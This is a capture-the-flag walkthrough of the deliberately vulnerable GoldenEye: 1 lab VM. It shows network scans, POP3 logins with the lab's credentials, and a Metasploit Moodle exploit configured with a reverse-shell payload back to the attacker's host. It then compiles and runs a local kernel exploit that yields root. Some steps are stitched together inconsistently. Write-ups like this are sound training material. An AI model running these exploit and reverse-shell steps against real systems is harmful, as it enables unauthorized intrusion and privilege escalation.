Name: GoldenEye: 1
Date release: 4 May 2018
Author: creosote
Series: GoldenEye
Description
I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.
I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.
I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be set up as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.

## Changelog
Beta - 2018-05-02
v1 - 2018-05-04
## Information gathering
### Finding the target's address
```
nmap -sP 10.0.0.0/24
```
Output:
```
┌──(root㉿kali)-[~]
└─# nmap -sP 10.0.0.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 09:58 CST
Nmap scan report for OpenWrt.lan (10.0.0.1)
Host is up (0.00073s latency).
MAC Address: 00:15:5D:64:C0:01 (Microsoft)
Nmap scan report for PC-A.lan (10.0.0.2)
Host is up (0.00045s latency).
MAC Address: 00:15:5D:64:C0:00 (Microsoft)
Nmap scan report for ubuntu.lan (10.0.0.101)
Host is up (0.00044s latency).
MAC Address: 00:0C:29:75:99:20 (VMware)
Nmap scan report for kali.lan (10.0.0.3)
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds
```
The target's IP is therefore 10.0.0.101.
### Scanning the target's ports
```
┌──(root㉿kali)-[~]
└─# nmap 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 13:36 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00055s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds
```
The JavaScript served by the web server on port 80 (note the comment block with the encoded password hint):

```javascript
var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];

//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//

var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

  var i = 0, isTag, text;
  // Typewriter effect: reveal one more character every 60 ms,
  // stepping straight through HTML tags so they are never shown half-written
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'> </span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}
```
```
┌──(root㉿kali)-[~/100project/001]
└─# nmap -p- 10.0.0.101
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:37 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.00089s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
55006/tcp open  unknown
55007/tcp open  unknown
MAC Address: 00:0C:29:75:99:20 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.15 seconds
```
```
┌──(root㉿kali)-[~/100project/001]
└─# nmap -p55006,55007 10.0.0.101 -sS -sV -A -T5
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-19 15:39 CST
Nmap scan report for 01.lan (10.0.0.101)
Host is up (0.0011s latency).

PORT      STATE SERVICE  VERSION
55006/tcp open  ssl/pop3 Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE PIPELINING UIDL USER SASL(PLAIN) CAPA RESP-CODES TOP
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
55007/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: PIPELINING UIDL SASL(PLAIN) STLS RESP-CODES AUTH-RESP-CODE CAPA USER TOP
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-04-24T03:23:52
|_Not valid after:  2028-04-23T03:23:52
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:75:99:20 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.06 ms 01.lan (10.0.0.101)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.25 seconds
```
```
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Boris          # enter the username
+OK
pass secret1!       # enter the password
+OK Logged in.
list
+OK 3 messages:
1 544
2 373
3 921
.
retr 1              # read message 1
+OK 544 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id D9E47454B1
	for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
retr 2
+OK 373 octets
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id C3F2B454B1
	for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
retr 3
+OK 921 octets
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id 4B9F4454B1
	for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
```
```
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user Natalya
+OK
pass bird
+OK Logged in.
list
+OK 2 messages:
1 631
2 1048
.
retr 1
+OK 631 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id D5EDA454B1
	for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
retr 2
+OK 1048 octets
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 17C96454B1
	for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
```
```
┌──(root㉿kali)-[~/100project/001]
└─# nc 10.0.0.101 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 97DC24549D
	for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!
.
```
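The three POP3 sessions above were typed into nc, which sends USER/PASS in clear text even though the nmap output shows Dovecot offering STLS on 55007. The script below is an added example, not part of the original walkthrough: it parses a RETR payload correctly (undoing RFC 1939 dot-stuffing) and performs the same USER/PASS/LIST/RETR flow after upgrading the connection with STLS. Host and port come from the walkthrough; the sample message is constructed from the second mail in Boris's box, with an extra stuffed line added to exercise the parser.

```python
import email
import poplib
from email import policy

# Values from the walkthrough: Dovecot on 55007 lists STLS in its capabilities.
POP3_HOST = "10.0.0.101"
POP3_PORT = 55007

# Constructed sample: the lines a RETR returns between "+OK n octets" and the
# terminating "." line. A body line beginning with "." is sent as ".." (RFC 1939).
SAMPLE_RETR = (
    b"Return-Path: <natalya@ubuntu>\r\n"
    b"X-Original-To: boris\r\n"
    b"Delivered-To: boris@ubuntu\r\n"
    b"Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)\r\n"
    b"From: natalya@ubuntu\r\n"
    b"\r\n"
    b"Boris, I can break your codes!\r\n"
    b"..this line really starts with one dot\r\n"
)

def unstuff(lines):
    """Reverse POP3 byte-stuffing: a leading '..' on the wire means '.'."""
    return [l[1:] if l.startswith(b"..") else l for l in lines]

def parse_message(lines):
    """Parse already un-stuffed lines (no CRLF) as an RFC 5322 message."""
    msg = email.message_from_bytes(b"\r\n".join(lines), policy=policy.default)
    return {
        "from": str(msg["From"]),
        "to": str(msg["X-Original-To"]),
        "body_lines": msg.get_content().splitlines(),
    }

def parse_retr(raw: bytes) -> dict:
    """Parse a raw RETR payload exactly as it arrived on the socket."""
    return parse_message(unstuff(raw.split(b"\r\n")))

def fetch_mailbox(user, password, host=POP3_HOST, port=POP3_PORT):
    """USER/PASS/LIST/RETR as in the nc session, but only after STLS has
    upgraded the socket; poplib strips CRLF and un-stuffs dots for us."""
    conn = poplib.POP3(host, port, timeout=10)
    try:
        conn.stls()  # raises if the server does not offer STLS
        conn.user(user)
        conn.pass_(password)
        count, _size = conn.stat()
        return [parse_message(conn.retr(n)[1]) for n in range(1, count + 1)]
    finally:
        conn.quit()
```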
```
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/moodle_spelling_path_rce
```
## Using the exploit
```
msfconsole                        --- open the MSF console
search moodle                     --- search for Moodle attack modules
use 0                             --- select module 0, the exploit/multi/http/moodle_cmd_exec attack script
set username admin                --- set the username: admin
set password xWinter1995x!        --- set the password: xWinter1995x!
set rhost severnaya-station.com   --- set rhosts: severnaya-station.com
set targeturi /gnocertdir         --- set the directory: /gnocertdir
set payload cmd/unix/reverse      --- set the payload: cmd/unix/reverse
set lhost 10.0.0.3                --- set lhost: 10.0.0.3 (your own IP)
run                               --- run it
```
```
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      80               yes       The target port (TCP)
   SESSKEY                     no        The session key of the user to impersonate
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /moodle/         yes       The URI of the Moodle installation
   USERNAME   admin            yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
```
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set password xWinter1995x!
password => xWinter1995x!
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set rhost severnaya-station.com
rhost => severnaya-station.com
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set targeturi /gnocertdir
targeturi => /gnocertdir
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf6 exploit(multi/http/moodle_spelling_binary_rce) > set lhost 10.0.0.3
lhost => 10.0.0.3
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/moodle_spelling_binary_rce) > run

[*] Started reverse TCP double handler on 10.0.0.3:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Exploitable Moodle version 2.2 detected
[*] Authenticating as user: admin
[*] Getting session key to update spellchecker if no session key was specified
[*] Updating spellchecker to use the system aspell
[*] Triggering payload
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 7YPpFMOnfF8gG8B3;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "7YPpFMOnfF8gG8B3\r\n"
[*] Matching...
[*] B is input...
whoami[*] Command shell session 2 opened (10.0.0.3:4444 -> 10.0.0.101:47575) at 2022-08-26 11:16:45 +0800
```
```
python -c "import pty;pty.spawn('/bin/bash')"
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /tmp
cd /tmp
www-data@01:/tmp$ uname -a
uname -a
Linux 01 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@01:/tmp$
```
```
www-data@01:/tmp$ cc 1.c -o exp
cc 1.c -o exp
1.c:62:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
1.c:74:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
    if(unshare(CLONE_NEWUSER) != 0)
       ^
1.c:79:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
    clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
    ^
1.c:85:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
    waitpid(pid, &status, 0);
    ^
1.c:95:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
    wait(NULL);
    ^
5 warnings generated.
www-data@01:/tmp$ ./exp
./exp
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
```